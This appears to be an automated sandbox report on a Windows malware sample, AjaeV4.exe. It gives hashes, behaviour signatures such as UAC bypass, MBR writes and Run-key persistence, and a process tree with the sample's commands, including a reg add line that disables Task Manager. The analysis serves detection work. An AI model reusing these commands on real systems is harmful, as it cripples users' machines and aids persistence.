Resubmissions
28/03/2025, 06:39
250328-he1a9svkz6 1028/03/2025, 01:14
250328-blp1jssmx9 1028/03/2025, 01:10
250328-bjsnnasmw4 1028/03/2025, 01:07
250328-bgxvlasmv7 10Analysis
-
max time kernel
119s -
max time network
132s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
-
submitted
28/03/2025, 01:07
Errors
Reason
Machine shutdown
General
-
Target
AjaeV4.exe
-
Size
178KB
-
MD5
0ad31a746adb58b3f5640deb8219ad80
-
SHA1
e12836ae66f3f8ffa53df39ae6fcee9bb7826255
-
SHA256
c971f1b41d62b335166aa5ee66534041264c31452cfe9ce8c5fabdce4917a461
-
SHA512
fb07d16b155e702f6b1075ee3f6f09335eeac35026493eb368f421f19aabe8c1d4d781c6daaf89fe7d4d62c0efe182c83fe64e3f0f6e44a6a8ab9f330c489f7c
-
SSDEEP
3072:Vq6+ouCpk2mpcWJ0r+QNTBf6E9hrLypYX+rxSeYNFnPTlf7QQFLczTQi2acGx:Vldk1cWQRNTBSu1yHEdNVZjQgLczUihx
Score
10/10
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
UAC bypass 3 TTPs 2 IoCs
-
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 4 TTPs
-
Executes dropped EXE 3 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 11 IoCs
-
Drops file in Windows directory 14 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 26 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 5 IoCs
-
Opens file in notepad (likely ransom note) 3 IoCs
-
Runs net.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 54 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\AjaeV4.exe"C:\Users\Admin\AppData\Local\Temp\AjaeV4.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9FF9.tmp\9FFA.tmp\9FFB.bat C:\Users\Admin\AppData\Local\Temp\AjaeV4.exe"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ajae.txt3⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\timeout.exetimeout 3 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=what3⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x304,0x7ffcd452f208,0x7ffcd452f214,0x7ffcd452f2204⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=2780 /prefetch:114⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2712,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=2708 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2148,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=2840 /prefetch:134⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4032,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4068 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4120,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4144 /prefetch:94⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4244,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4236 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4288,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:94⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3780,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=5416 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=3736,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=5576 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4612,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5232,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=5260 /prefetch:124⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5700,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4104 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5472,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=3764 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6228,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:144⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11165⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6288,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6448,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6340 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5216,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6560 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7024,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6480,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7088,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7072 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7080,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7264 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7116,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7040 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7244,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7500,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7352 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6464,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6576 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=7120,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7300 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=6284,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=7388,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6984 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=6400,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6436 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=7300,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6644 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5680,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=4664,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4832 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7012,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=7340,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7580 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4824,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4360 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4268,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4856,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=5788,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=3752 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=5352,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6696 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=6644,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6900 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=5772,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=7724,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7704 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=6908,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7912 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=8132,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=8112 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=7908,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=8104 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=8456,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=8476 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=8544,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=8556 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=8692,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=8728 /prefetch:14⤵
-
-
